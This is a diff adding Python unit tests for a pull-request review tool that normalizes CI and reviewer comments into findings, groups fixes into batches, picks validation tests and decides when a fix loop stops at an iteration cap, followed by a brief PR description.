+                "typecheck_command": "mypy",
+                "pytest_command": "python3 -m pytest",
+                "test_paths": ["tests/unit/test_foo.py"],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    # Two fix_now items:
+    # - Same batch_key ("module/a.py" via _batch_from_finding's path fallback)
+    # - Non-overlapping write_scopes (both empty -> no overlap)
+    # - Identical derived validation_steps (same finding shape -> same selector output)
+    # This is the shape that SHOULD group into one batch. Under the old
+    # (broken) ordering these items would fall into separate groups
+    # because validation_steps was missing and finding_id became the
+    # group key.
+    backlog_path.write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "at_loop_cap": False,
+                "allowed_decisions": [
+                    "fix_now",
+                    "verify_first",
+                    "defer",
+                    "drop",
+                    "needs_human_decision",
+                ],
+                "counts": {
+                    "fix_now": 2,
+                    "verify_first": 0,
+                    "defer": 0,
+                    "drop": 0,
+                    "needs_human_decision": 0,
+                },
+                "items": [
+                    _backlog_item(
+                        "F-001",
+                        decision="fix_now",
+                        severity="medium",
+                        confidence="medium",
+                        path="module/a.py",
+                        write_scope=[],
+                        validation_steps=None,
+                    ),
+                    _backlog_item(
+                        "F-002",
+                        decision="fix_now",
+                        severity="medium",
+                        confidence="medium",
+                        path="module/a.py",
+                        write_scope=[],
+                        validation_steps=None,
+                    ),
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    # Drop the test-helper default validation_steps so we really start
+    # with items where validation_steps is absent/empty (the bug case).
+    raw = json.loads(backlog_path.read_text(encoding="utf-8"))
+    for item in raw["items"]:
+        item.pop("validation_steps", None)
+    backlog_path.write_text(json.dumps(raw), encoding="utf-8")
+
+    def run(*args: str) -> subprocess.CompletedProcess[str]:
+        result = subprocess.run(
+            [sys.executable, str(script), *args],
+            cwd=tmp_path,
+            capture_output=True,
+            text=True,
+            check=False,
+        )
+        assert result.returncode == 0, (args, result.stderr)
+        return result
+
+    # --- Step 4 (fixed order): select validation BEFORE batching ---
+    run(
+        "select-batch-validation",
+        "--backlog",
+        str(backlog_path),
+        "--repo-inventory",
+        str(inventory_path),
+    )
+
+    updated = json.loads(backlog_path.read_text(encoding="utf-8"))
+    for item in updated["items"]:
+        assert isinstance(item.get("validation_steps"), list)
+        assert any(step["level"] == 0 for step in item["validation_steps"])
+
+    # --- Step 5: batch ---
+    run("build-fix-batches", "--backlog", str(backlog_path), "--output", str(batches_path))
+
+    batches = json.loads(batches_path.read_text(encoding="utf-8"))
+    # With the fixed order, the two fix_now items share batch_key
+    # (derived from their common path) and share an identical
+    # validation signature (same selector output for identical inputs),
+    # with non-overlapping write_scopes (both empty) => one batch, two items.
+    assert len(batches) == 1, batches
+    assert len(batches[0]["items"]) == 2, batches[0]
+
+
+def test_skipping_select_batch_validation_forces_one_item_batches_regression_guard(
+    tmp_path: Path,
+) -> None:
+    """Regression guard: running build-fix-batches WITHOUT first running
+    select-batch-validation reproduces the PR #94 bug (items with missing
+    validation_steps are bucketed by finding_id into one-item batches).
+
+    Documents the hazard so a future refactor that silently removes the
+    select-batch-validation step gets caught by a failing test.
+    """
+
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+
+    backlog_path = tmp_path / "review_backlog.json"
+    batches_path = tmp_path / "fix_batches.json"
+
+    # Same shape as the positive test: two fix_now items that SHOULD batch
+    # together when validation_steps is populated.
+    backlog_path.write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "at_loop_cap": False,
+                "allowed_decisions": [
+                    "fix_now",
+                    "verify_first",
+                    "defer",
+                    "drop",
+                    "needs_human_decision",
+                ],
+                "counts": {
+                    "fix_now": 2,
+                    "verify_first": 0,
+                    "defer": 0,
+                    "drop": 0,
+                    "needs_human_decision": 0,
+                },
+                "items": [
+                    _backlog_item(
+                        "F-001",
+                        decision="fix_now",
+                        path="module/a.py",
+                        write_scope=[],
+                        validation_steps=None,
+                    ),
+                    _backlog_item(
+                        "F-002",
+                        decision="fix_now",
+                        path="module/a.py",
+                        write_scope=[],
+                        validation_steps=None,
+                    ),
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+    raw = json.loads(backlog_path.read_text(encoding="utf-8"))
+    for item in raw["items"]:
+        item.pop("validation_steps", None)
+    backlog_path.write_text(json.dumps(raw), encoding="utf-8")
+
+    # Deliberately skip select-batch-validation and go straight to batching.
+    result = subprocess.run(
+        [
+            sys.executable,
+            str(script),
+            "build-fix-batches",
+            "--backlog",
+            str(backlog_path),
+            "--output",
+            str(batches_path),
+        ],
+        cwd=tmp_path,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+    assert result.returncode == 0, result.stderr
+
+    batches = json.loads(batches_path.read_text(encoding="utf-8"))
+    # Without validation_steps, _validation_scope_signature returns (),
+    # which triggers the unknown_scope_bucket=finding_id fallback in
+    # build_fix_batches. Two items -> two one-item batches.
+    assert len(batches) == 2, batches
+    for batch in batches:
+        assert len(batch["items"]) == 1, batch

--- a/tests/unit/test_pr_review_cycle.py
+++ b/tests/unit/test_pr_review_cycle.py
@@ -1,0 +1,463 @@
+"""Unit tests for PR review-cycle intake, batching, and stop classification."""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+import random
+import subprocess
+import sys
+
+import pytest
+
+from quest_runtime.pr_review_cycle import (
+    build_fix_batches,
+    classify_pr_loop_stop,
+    normalize_pr_review_intake,
+)
+from quest_runtime.review_intelligence import validate_findings
+
+
+def _validation_step(target: str, *, level: int = 1) -> list[dict[str, object]]:
+    return [
+        {
+            "level": level,
+            "target": target,
+            "command": f"python3 -m pytest {target}",
+            "reason": "test",
+        }
+    ]
+
+
+def _backlog_item(
+    finding_id: str,
+    *,
+    decision: str = "fix_now",
+    severity: str = "medium",
+    confidence: str = "medium",
+    path: str = "module/a.py",
+    write_scope: list[str] | None = None,
+    validation_steps: list[dict[str, object]] | None = None,
+) -> dict[str, object]:
+    return {
+        "finding_id": finding_id,
+        "source": "reviewer",
+        "kind": "review_comment",
+        "severity": severity,
+        "confidence": confidence,
+        "path": path,
+        "line": None,
+        "summary": "summary",
+        "why_it_matters": "matters",
+        "evidence": ["evidence"],
+        "action": "action",
+        "needs_test": False,
+        "write_scope": write_scope or [],
+        "related_acceptance_criteria": [],
+        "decision": decision,
+        "decision_confidence": "medium",
+        "reason": "reason",
+        "needs_validation": [],
+        "owner": "builder",
+        "batch": "batch",
+        "validation_steps": validation_steps or _validation_step("tests/unit/test_default.py"),
+    }
+
+
+def test_normalize_pr_review_intake_merges_ci_inline_general_into_canonical_findings() -> None:
+    intake = {
+        "ci_checks": [
+            {
+                "job": "unit",
+                "state": "failing",
+                "failed_path": "scripts/quest_runtime/pr_review_cycle.py",
+                "kind_hint": "test_failure",
+            },
+            {
+                "job": "lint",
+                "state": "green",
+                "failed_path": None,
+            },
+        ],
+        "inline_comments": [
+            {
+                "commenter": "alice",
+                "body": "This is blocking because it breaks id generation.",
+                "path": "scripts/quest_runtime/pr_review_cycle.py",
+                "line": 42,
+            }
+        ],
+        "general_comments": [
+            {"commenter": "bob", "body": "Please tighten this flow before merge."}
+        ],
+        "existing_findings": [
+            {
+                "finding_id": "existing-001",
+                "source": "historical",
+                "kind": "review_comment",
+                "severity": "low",
+                "confidence": "low",
+                "path": "docs/notes.md",
+                "line": None,
+                "summary": "Existing note",
+                "why_it_matters": "Track deferred concern.",
+                "evidence": ["prior evidence"],
+                "action": "Keep in backlog.",
+                "needs_test": False,
+                "write_scope": ["docs/notes.md"],
+                "related_acceptance_criteria": [],
+            }
+        ],
+    }
+
+    findings = normalize_pr_review_intake(intake)
+    assert len(findings) == 4
+    assert validate_findings(findings) == []
+
+    finding_ids = {finding["finding_id"] for finding in findings}
+    assert "pr-ci-001" in finding_ids
+    assert "pr-inline-001" in finding_ids
+    assert "pr-general-001" in finding_ids
+    assert "existing-001" in finding_ids
+
+    inline = next(finding for finding in findings if finding["finding_id"] == "pr-inline-001")
+    ci = next(finding for finding in findings if finding["finding_id"] == "pr-ci-001")
+
+    assert inline["severity"] == "high"
+    assert inline["needs_test"] is True
+    assert ci["evidence"] == ["ci:unit state=failing"]
+    assert ci["needs_test"] is True
+
+
+def test_build_fix_batches_groups_by_write_scope_and_validation_scope() -> None:
+    items = [
+        _backlog_item(
+            "F-002",
+            decision="fix_now",
+            path="module/a.py",
+            write_scope=[],
+            validation_steps=_validation_step("tests/unit/test_a.py"),
+        ),
+        _backlog_item(
+            "F-001",
+            decision="verify_first",
+            path="module/a.py",
+            write_scope=[],
+            validation_steps=_validation_step("tests/unit/test_a.py"),
+        ),
+        _backlog_item(
+            "F-003",
+            decision="fix_now",
+            path="module/a.py",
+            write_scope=[],
+            validation_steps=_validation_step("tests/integration/test_a.py"),
+        ),
+        _backlog_item("F-004", decision="defer", path="module/a.py", write_scope=[]),
+    ]
+
+    batches = build_fix_batches(items)
+    assert len(batches) == 2
+
+    first = batches[0]
+    second = batches[1]
+    assert first["batch_key"] == "module/a.py"
+    assert [item["finding_id"] for item in first["items"]] == ["F-001", "F-002"]
+    assert [item["finding_id"] for item in second["items"]] == ["F-003"]
+
+
+def test_build_fix_batches_detects_exact_path_overlap() -> None:
+    items = [
+        _backlog_item(
+            "F-001",
+            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+        _backlog_item(
+            "F-002",
+            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+    ]
+
+    batches = build_fix_batches(items)
+    assert len(batches) == 2
+    assert [batch["batch_id"] for batch in batches] == [
+        "scripts/quest_runtime/pr_review_cycle.py-1",
+        "scripts/quest_runtime/pr_review_cycle.py-2",
+    ]
+
+
+def test_build_fix_batches_detects_parent_child_prefix_overlap() -> None:
+    items = [
+        _backlog_item(
+            "F-001",
+            write_scope=["scripts/quest_runtime"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+        _backlog_item(
+            "F-002",
+            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+    ]
+
+    batches = build_fix_batches(items)
+    assert len(batches) == 2
+
+
+def test_build_fix_batches_normalizes_trailing_slash_for_overlap() -> None:
+    items = [
+        _backlog_item(
+            "F-001",
+            write_scope=["scripts/quest_runtime/"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+        _backlog_item(
+            "F-002",
+            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            validation_steps=_validation_step("tests/unit/test_one.py"),
+        ),
+    ]
+
+    batches = build_fix_batches(items)
+    assert len(batches) == 2
+
+
+def test_build_fix_batches_is_deterministic_for_shuffled_input() -> None:
+    items = [
+        _backlog_item(
+            "F-003",
+            path="module/a.py",
+            write_scope=[],
+            validation_steps=_validation_step("tests/unit/test_a.py"),
+        ),
+        _backlog_item(
+            "F-001",
+            path="module/a.py",
+            write_scope=[],
+            validation_steps=_validation_step("tests/unit/test_a.py"),
+        ),
+        _backlog_item(
+            "F-002",
+            path="module/a.py",
+            write_scope=[],
+            validation_steps=_validation_step("tests/unit/test_b.py"),
+        ),
+    ]
+    baseline = build_fix_batches(items)
+
+    shuffled = items[:]
+    random.Random(7).shuffle(shuffled)
+    rerun = build_fix_batches(shuffled)
+
+    assert baseline == rerun
+
+
+@pytest.mark.parametrize(
+    ("ci_state", "actionable_count", "iteration"),
+    [
+        (ci_state, actionable_count, iteration)
+        for ci_state in ("green", "failing", "pending", "unknown")
+        for actionable_count in (0, 2)
+        for iteration in (2, 3, 4)
+    ],
+)
+def test_classify_pr_loop_stop_matrix(
+    ci_state: str, actionable_count: int, iteration: int
+) -> None:
+    cap = 3
+    result = classify_pr_loop_stop(
+        ci_state=ci_state,
+        actionable_count=actionable_count,
+        iteration=iteration,
+        cap=cap,
+    )
+
+    if ci_state == "green" and actionable_count == 0 and iteration <= cap:
+        assert result["stop"] is True
+        assert result["outcome"] == "success"
+        assert result["retag_required"] is False
+        return
+
+    if iteration < cap:
+        assert result["stop"] is False
+        assert result["outcome"] == "continue"
+        assert result["retag_required"] is False
+    else:
+        assert result["stop"] is True
+        assert result["outcome"] == "cap_enforced"
+        assert result["retag_required"] is (actionable_count > 0)
+
+
+def test_cli_normalize_pr_intake_round_trip(tmp_path: Path) -> None:
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+    input_path = tmp_path / "intake.json"
+    output_path = tmp_path / "findings.json"
+
+    intake = {
+        "ci_checks": [
+            {
+                "job": "unit",
+                "state": "failing",
+                "failed_path": "scripts/example.py",
+                "kind_hint": "test_failure",
+            }
+        ],
+        "inline_comments": [],
+        "general_comments": [],
+        "existing_findings": [],
+    }
+    input_path.write_text(json.dumps(intake), encoding="utf-8")
+
+    result = subprocess.run(
+        [
+            sys.executable,
+            str(script),
+            "normalize-pr-intake",
+            "--input",
+            str(input_path),
+            "--output",
+            str(output_path),
+        ],
+        cwd=tmp_path,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+
+    assert result.returncode == 0
+    payload = json.loads(result.stdout)
+    assert payload["ok"] is True
+    findings = json.loads(output_path.read_text(encoding="utf-8"))
+    assert isinstance(findings, list)
+    assert validate_findings(findings) == []
+
+
+def test_cli_build_fix_batches_round_trip(tmp_path: Path) -> None:
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+    backlog_path = tmp_path / "review_backlog.json"
+    output_path = tmp_path / "batches.json"
+
+    backlog_payload = {
+        "items": [
+            _backlog_item(
+                "F-001",
+                decision="fix_now",
+                write_scope=["scripts/a.py"],
+                validation_steps=_validation_step("tests/unit/test_a.py"),
+            ),
+            _backlog_item(
+                "F-002",
+                decision="defer",
+                write_scope=["scripts/b.py"],
+                validation_steps=_validation_step("tests/unit/test_b.py"),
+            ),
+        ]
+    }
+    backlog_path.write_text(json.dumps(backlog_payload), encoding="utf-8")
+
+    result = subprocess.run(
+        [
+            sys.executable,
+            str(script),
+            "build-fix-batches",
+            "--backlog",
+            str(backlog_path),
+            "--output",
+            str(output_path),
+        ],
+        cwd=tmp_path,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+
+    assert result.returncode == 0
+    payload = json.loads(result.stdout)
+    assert payload["ok"] is True
+    batches = json.loads(output_path.read_text(encoding="utf-8"))
+    assert isinstance(batches, list)
+    assert len(batches) == 1
+    assert batches[0]["batch_key"] == "scripts/a.py"
+
+
+def test_cli_classify_pr_stop_round_trip(tmp_path: Path) -> None:
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+    quest_id = "sample-quest_2026-04-17__2101"
+    backlog_dir = tmp_path / ".quest" / quest_id / "phase_03_review"
+    backlog_dir.mkdir(parents=True, exist_ok=True)
+    backlog_path = backlog_dir / "review_backlog.json"
+    retag_output = tmp_path / "retagged_backlog.json"
+
+    backlog_payload = {
+        "version": 1,
+        "generated_at": "2026-01-01T00:00:00Z",
+        "at_loop_cap": False,
+        "allowed_decisions": [
+            "fix_now",
+            "verify_first",
+            "defer",
+            "drop",
+            "needs_human_decision",
+        ],
+        "counts": {
+            "fix_now": 1,
+            "verify_first": 0,
+            "defer": 0,
+            "drop": 0,
+            "needs_human_decision": 0,
+        },
+        "items": [
+            _backlog_item(
+                "F-001",
+                decision="fix_now",
+                severity="medium",
+                confidence="medium",
+                write_scope=["scripts/a.py"],
+            ),
+        ],
+    }
+    backlog_path.write_text(json.dumps(backlog_payload), encoding="utf-8")
+
+    result = subprocess.run(
+        [
+            sys.executable,
+            str(script),
+            "classify-pr-stop",
+            "--ci-state",
+            "failing",
+            "--actionable",
+            "1",
+            "--iteration",
+            "3",
+            "--cap",
+            "3",
+            "--backlog",
+            str(backlog_path),
+            "--retag-output",
+            str(retag_output),
+        ],
+        cwd=tmp_path,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+
+    assert result.returncode == 0
+    payload = json.loads(result.stdout)
+    assert payload["stop"] is True
+    assert payload["outcome"] == "cap_enforced"
+    assert payload["retag_required"] is True
+    assert "deferred_count" in payload
+    assert payload["deferred_count"] == 1
+
+    retagged = json.loads(backlog_path.read_text(encoding="utf-8"))
+    assert retagged["at_loop_cap"] is True
+    assert retagged["counts"]["fix_now"] == 0
+    assert retagged["counts"]["defer"] == 1
+    assert retag_output.exists()
+
+    deferred_path = tmp_path / ".quest" / "backlog" / "deferred_findings.jsonl"
+    assert deferred_path.exists()
+    first_record = json.loads(deferred_path.read_text(encoding="utf-8").splitlines()[0])
+    assert first_record["deferred_by_quest"] == quest_id

--- a/tests/unit/test_pr_review_cycle.py
+++ b/tests/unit/test_pr_review_cycle.py
@@ -665,3 +665,108 @@ def test_cli_classify_pr_stop_derives_deferred_jsonl_from_backlog_when_cwd_unrel
     assert not cwd_deferred.exists()
     first_record = json.loads(expected_deferred.read_text(encoding="utf-8").splitlines()[0])
     assert first_record["deferred_by_quest"] == quest_id
+
+
+def test_classify_pr_loop_stop_resolves_cap_from_context_path(tmp_path: Path) -> None:
+    from quest_runtime.pr_review_cycle import allowlist_path_from_context
+
+    repo = tmp_path / "repo"
+    (repo / ".ai").mkdir(parents=True)
+    (repo / ".ai" / "allowlist.json").write_text(
+        json.dumps({"gates": {"max_fix_iterations": 7}}),
+        encoding="utf-8",
+    )
+    backlog_path = repo / ".quest" / "q" / "phase_03_review" / "review_backlog.json"
+    backlog_path.parent.mkdir(parents=True)
+    backlog_path.write_text("{}", encoding="utf-8")
+
+    allowlist = allowlist_path_from_context(backlog_path)
+    assert allowlist == repo / ".ai" / "allowlist.json"
+
+    assert (
+        classify_pr_loop_stop("failing", 1, 6, allowlist_path=allowlist)["outcome"]
+        == "continue"
+    )
+    assert (
+        classify_pr_loop_stop("failing", 1, 7, allowlist_path=allowlist)["outcome"]
+        == "cap_enforced"
+    )
+
+
+def test_cli_classify_pr_stop_honors_backlog_repo_allowlist_from_unrelated_cwd(
+    tmp_path: Path,
+) -> None:
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+
+    repo = tmp_path / "repo"
+    (repo / ".ai").mkdir(parents=True)
+    # Target repo caps iterations at 5
+    (repo / ".ai" / "allowlist.json").write_text(
+        json.dumps({"gates": {"max_fix_iterations": 5}}),
+        encoding="utf-8",
+    )
+
+    quest_id = "cap-context-quest_2026-04-18__0002"
+    backlog_dir = repo / ".quest" / quest_id / "phase_03_review"
+    backlog_dir.mkdir(parents=True)
+    backlog_path = backlog_dir / "review_backlog.json"
+    backlog_path.write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "at_loop_cap": False,
+                "allowed_decisions": [
+                    "fix_now",
+                    "verify_first",
+                    "defer",
+                    "drop",
+                    "needs_human_decision",
+                ],
+                "counts": {
+                    "fix_now": 1,
+                    "verify_first": 0,
+                    "defer": 0,
+                    "drop": 0,
+                    "needs_human_decision": 0,
+                },
+                "items": [
+                    _backlog_item(
+                        "F-001",
+                        decision="fix_now",
+                        severity="medium",
+                        confidence="medium",
+                        write_scope=["scripts/a.py"],
+                    ),
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    # Unrelated cwd with no .ai/allowlist.json — must NOT determine cap
+    cwd = tmp_path / "unrelated_cwd"
+    cwd.mkdir()
+
+    # iteration=4 with cap=5 should continue; classifier must pick up the repo's gate
+    result = subprocess.run(
+        [
+            sys.executable,
+            str(script),
+            "classify-pr-stop",
+            "--ci-state",
+            "failing",
+            "--actionable",
+            "1",
+            "--iteration",
+            "4",
+            "--backlog",
+            str(backlog_path),
+        ],
+        cwd=cwd,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+    assert result.returncode == 0, result.stderr
+    payload = json.loads(result.stdout)
+    assert payload["outcome"] == "continue", payload

--- a/tests/unit/test_pr_review_cycle.py
+++ b/tests/unit/test_pr_review_cycle.py
@@ -567,3 +567,101 @@ def test_select_validation_steps_finds_root_level_nearest_tests() -> None:
     steps = select_validation_steps(finding, repo_inventory=inventory)
     level1 = [step for step in steps if step["level"] == 1]
     assert any("test_setup.py" in step["target"] for step in level1), steps
+
+
+def test_normalize_pr_review_intake_skips_pending_and_unknown_ci_states() -> None:
+    intake = {
+        "ci_checks": [
+            {"job": "unit", "state": "green"},
+            {"job": "lint", "state": "pending"},
+            {"job": "typecheck", "state": "unknown"},
+            {"job": "in-progress-runner", "state": "in_progress"},
+            {"job": "flaky", "state": "failing", "failed_path": "scripts/foo.py"},
+            {"job": "build", "state": "error", "failed_path": "Makefile", "kind_hint": "build_failure"},
+        ]
+    }
+
+    findings = normalize_pr_review_intake(intake)
+    ci_findings = [finding for finding in findings if finding["finding_id"].startswith("pr-ci-")]
+
+    sources = sorted(finding["source"] for finding in ci_findings)
+    assert sources == ["pr-ci:build", "pr-ci:flaky"], ci_findings
+
+
+def test_cli_classify_pr_stop_derives_deferred_jsonl_from_backlog_when_cwd_unrelated(
+    tmp_path: Path,
+) -> None:
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+
+    # Repo root with the real backlog; we will run the CLI from a separate cwd
+    repo = tmp_path / "repo"
+    quest_id = "cross-cwd-quest_2026-04-18__0001"
+    backlog_dir = repo / ".quest" / quest_id / "phase_03_review"
+    backlog_dir.mkdir(parents=True, exist_ok=True)
+    backlog_path = backlog_dir / "review_backlog.json"
+
+    backlog_payload = {
+        "version": 1,
+        "generated_at": "2026-04-18T00:00:00Z",
+        "at_loop_cap": False,
+        "allowed_decisions": [
+            "fix_now",
+            "verify_first",
+            "defer",
+            "drop",
+            "needs_human_decision",
+        ],
+        "counts": {
+            "fix_now": 1,
+            "verify_first": 0,
+            "defer": 0,
+            "drop": 0,
+            "needs_human_decision": 0,
+        },
+        "items": [
+            _backlog_item(
+                "F-001",
+                decision="fix_now",
+                severity="medium",
+                confidence="medium",
+                write_scope=["scripts/a.py"],
+            ),
+        ],
+    }
+    backlog_path.write_text(json.dumps(backlog_payload), encoding="utf-8")
+
+    # Unrelated working directory the CLI runs from
+    cwd_dir = tmp_path / "unrelated_cwd"
+    cwd_dir.mkdir()
+
+    result = subprocess.run(
+        [
+            sys.executable,
+            str(script),
+            "classify-pr-stop",
+            "--ci-state",
+            "failing",
+            "--actionable",
+            "1",
+            "--iteration",
+            "3",
+            "--cap",
+            "3",
+            "--backlog",
+            str(backlog_path),
+        ],
+        cwd=cwd_dir,
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+
+    assert result.returncode == 0, result.stderr
+
+    # Deferred record landed under the REPO's .quest/, not under cwd_dir
+    expected_deferred = repo / ".quest" / "backlog" / "deferred_findings.jsonl"
+    cwd_deferred = cwd_dir / ".quest" / "backlog" / "deferred_findings.jsonl"
+    assert expected_deferred.exists()
+    assert not cwd_deferred.exists()
+    first_record = json.loads(expected_deferred.read_text(encoding="utf-8").splitlines()[0])
+    assert first_record["deferred_by_quest"] == quest_id

--- a/tests/unit/test_quest_select_tests.py
+++ b/tests/unit/test_quest_select_tests.py
@@ -1,0 +1,148 @@
+"""Unit tests for validation-step selection heuristics."""
+
+from __future__ import annotations
+
+from quest_runtime.pr_review_cycle import select_validation_steps
+
+
+def _finding(
+    *,
+    finding_id: str = "F-001",
+    kind: str = "review_comment",
+    path: str = "scripts/quest_runtime/pr_review_cycle.py",
+    write_scope: list[str] | None = None,
+    needs_test: bool = True,
+    suggested_test: str | None = None,
+    shared_boundary: bool = False,
+) -> dict[str, object]:
+    finding: dict[str, object] = {
+        "finding_id": finding_id,
+        "source": "reviewer",
+        "kind": kind,
+        "severity": "medium",
+        "confidence": "medium",
+        "path": path,
+        "line": None,
+        "summary": "summary",
+        "why_it_matters": "matters",
+        "evidence": ["evidence"],
+        "action": "action",
+        "needs_test": needs_test,
+        "write_scope": write_scope or [path],
+        "related_acceptance_criteria": [],
+    }
+    if suggested_test is not None:
+        finding["suggested_test"] = suggested_test
+    if shared_boundary:
+        finding["shared_boundary"] = True
+    return finding
+
+
+def test_select_validation_steps_prioritizes_backlog_named_tests() -> None:
+    inventory = {
+        "format_command": "fmt",
+        "lint_command": "lint",
+        "typecheck_command": "typecheck",
+        "pytest_command": "pytest",
+        "test_paths": ["tests/unit/test_named.py", "tests/unit/test_other.py"],
+    }
+    finding = _finding(suggested_test="tests/unit/test_named.py")
+
+    steps = select_validation_steps(finding, repo_inventory=inventory)
+    level1_steps = [step for step in steps if step["level"] == 1]
+
+    assert level1_steps
+    assert level1_steps[0]["target"] == "tests/unit/test_named.py"
+    assert level1_steps[0]["command"] == "pytest tests/unit/test_named.py"
+
+
+def test_select_validation_steps_falls_back_to_nearest_tests_then_module_level() -> None:
+    inventory = {
+        "format_command": "fmt",
+        "lint_command": "lint",
+        "typecheck_command": "typecheck",
+        "pytest_command": "pytest",
+        "test_paths": [
+            "tests/scripts/quest_runtime/test_pr_review_cycle.py",
+            "tests/unit/test_misc.py",
+        ],
+        "module_tests_target": "tests/unit/",
+    }
+
+    nearest_steps = select_validation_steps(
+        _finding(path="scripts/quest_runtime/pr_review_cycle.py", write_scope=[]),
+        repo_inventory=inventory,
+    )
+    nearest_level1 = [step for step in nearest_steps if step["level"] == 1]
+    assert nearest_level1[0]["target"] == "tests/scripts/quest_runtime/test_pr_review_cycle.py"
+
+    module_steps = select_validation_steps(
+        _finding(path="unmapped/module.py", write_scope=["unmapped/module.py"]),
+        repo_inventory=inventory,
+    )
+    module_level1 = [step for step in module_steps if step["level"] == 1]
+    assert module_level1[0]["target"] == "tests/unit/"
+
+
+def test_select_validation_steps_escalates_to_level_2_only_for_shared_boundary_changes() -> None:
+    inventory = {
+        "format_command": "fmt",
+        "lint_command": "lint",
+        "typecheck_command": "typecheck",
+        "pytest_command": "pytest",
+        "test_paths": ["tests/unit/test_local.py"],
+        "level2_command": "pytest tests/",
+        "level2_target": "tests/",
+    }
+
+    local_steps = select_validation_steps(
+        _finding(path="scripts/local_module.py", write_scope=["scripts/local_module.py"]),
+        repo_inventory=inventory,
+    )
+    assert not [step for step in local_steps if step["level"] == 2]
+
+    shared_steps = select_validation_steps(
+        _finding(
+            path="scripts/quest_runtime/pr_review_cycle.py",
+            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+        ),
+        repo_inventory=inventory,
+    )
+    level2 = [step for step in shared_steps if step["level"] == 2]
+    assert level2
+    assert level2[0]["target"] == "tests/"
+
+
+def test_select_validation_steps_escalates_level_2_for_directory_scope_shared_boundary() -> None:
+    inventory = {
+        "format_command": "fmt",
+        "lint_command": "lint",
+        "typecheck_command": "typecheck",
+        "pytest_command": "pytest",
+        "test_paths": ["tests/unit/test_local.py"],
+        "level2_command": "pytest tests/",
+        "level2_target": "tests/",
+    }
+
+    directory_scope_steps = select_validation_steps(
+        _finding(
+            path="scripts/quest_runtime/pr_review_cycle.py",
+            write_scope=["scripts/quest_runtime"],
+        ),
+        repo_inventory=inventory,
+    )
+    level2 = [step for step in directory_scope_steps if step["level"] == 2]
+    assert level2
+    assert level2[0]["target"] == "tests/"
+
+
+def test_select_validation_steps_degrades_gracefully_when_scaffolding_missing() -> None:
+    steps = select_validation_steps(
+        _finding(path="scripts/example.py", write_scope=["scripts/example.py"]),
+        repo_inventory=None,
+    )
+    level0_steps = [step for step in steps if step["level"] == 0]
+
+    assert level0_steps
+    assert all(step["command"] == "true" for step in level0_steps)
+    assert all("passthrough" in step["reason"] for step in level0_steps)

--- a/tests/unit/test_review_intelligence.py
+++ b/tests/unit/test_review_intelligence.py
@@ -7,6 +7,10 @@ from pathlib import Path
 import subprocess
 import sys
 
+from quest_runtime.pr_review_cycle import (
+    normalize_pr_review_intake,
+    retag_backlog_at_cap,
+)
 from quest_runtime.review_intelligence import (
     append_deferred_findings,
     build_review_backlog,
@@ -282,6 +286,59 @@ def test_synthesize_plan_review_findings_merges_duplicates_across_reviewers() ->
     assert len(merged) == 1
     assert merged[0]["source_lineage"] == ["plan-reviewer-a", "plan-reviewer-b"]
     assert validate_findings(merged) == []
+
+
+def test_normalized_intake_findings_flow_through_existing_backlog_policy() -> None:
+    intake = {
+        "ci_checks": [
+            {
+                "job": "unit-tests",
+                "state": "failing",
+                "failed_path": "scripts/example.py",
+                "kind_hint": "test_failure",
+            }
+        ],
+        "inline_comments": [
+            {
+                "commenter": "reviewer",
+                "body": "Looks blocking due to error handling.",
+                "path": "scripts/example.py",
+                "line": 14,
+            }
+        ],
+        "general_comments": [],
+        "existing_findings": [],
+    }
+
+    findings = normalize_pr_review_intake(intake)
+    assert validate_findings(findings) == []
+
+    backlog = build_review_backlog(findings, at_loop_cap=False)
+    assert backlog["version"] == 1
+    assert backlog["counts"]["fix_now"] >= 1
+    assert all(
+        item["decision"]
+        in {"fix_now", "verify_first", "defer", "drop", "needs_human_decision"}
+        for item in backlog["items"]
+    )
+
+
+def test_retag_backlog_at_cap_uses_select_decision_loop_cap_semantics() -> None:
+    finding = _finding(severity="medium", confidence="medium")
+    backlog = build_review_backlog([finding], at_loop_cap=False)
+    assert backlog["items"][0]["decision"] == "verify_first"
+
+    expected = select_decision(finding, at_loop_cap=True)
+    retagged = retag_backlog_at_cap(backlog)
+    item = retagged["items"][0]
+
+    assert retagged["at_loop_cap"] is True
+    assert item["decision"] == expected["decision"]
+    assert item["decision_confidence"] == expected["decision_confidence"]
+    assert item["reason"] == expected["reason"]
+    assert item["needs_validation"] == expected["needs_validation"]
+    assert item["owner"] == expected["owner"]
+    assert item["batch"] == expected["batch"]
 
 
 def test_scan_backlog_cli_accepts_empty_paths(tmp_path: Path) -> None:


### PR DESCRIPTION
## Summary
Ship Phase 2 of the canonical review-intelligence proposal so pr-shepherd normalizes PR review intake through the Phase 1 contract, batches actionable fixes safely, picks the smallest falsifying validation, and stops under explicit bounded conditions.
